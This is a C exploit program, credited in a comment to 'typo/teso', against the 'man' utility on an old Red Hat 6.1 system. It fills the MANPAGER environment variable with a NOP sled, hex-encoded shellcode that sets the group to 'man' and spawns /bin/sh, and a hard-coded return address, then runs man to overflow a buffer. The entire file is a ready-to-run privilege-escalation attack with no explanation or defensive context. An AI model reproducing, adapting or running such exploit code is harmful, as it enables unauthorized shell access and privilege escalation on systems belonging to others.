1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#define OFFSET 0xbfffb32e
#define LEN 4061
#define GID "15" /* man::15: on rh6.1 */
unsigned char shellcode[] =
"\x31\xc0\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\xb0\x47\xcd\x80\xeb\x1e"
"\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53"
"\x0c\xb0\x0b\xcd\x80\x89\xc3\x31\xc0\xb0\x01\xcd\x80\xe8\xdd\xff\xff"
"\xff\x2f\x62\x69\x6e\x2f\x73\x68\x74\x65\x73\x6f\x63\x72\x65\x77\x21"
"\x21";
/* man sploit by typo/teso (typo@inferno.tusculum.edu) */
int main(int argc, char *argv[])
{
int offset = argc > 1 ? atoi(argv[1]) + OFFSET : OFFSET;
int eob = argc > 2 ? atoi(argv[2]) : LEN;
char *buffer;
printf("eob = %d, offset = 0x%x\n", eob, offset);
buffer = malloc(eob+8);
memset(buffer, 0x90, eob);
memcpy(buffer + eob - strlen(shellcode) - 8, shellcode, strlen(shellcode));
memcpy(buffer + eob - 4, &offset, 4);
buffer[eob] = '\0';
setenv("MANPAGER", buffer, 1);
execlp("man", "man", "man", NULL);
}
|
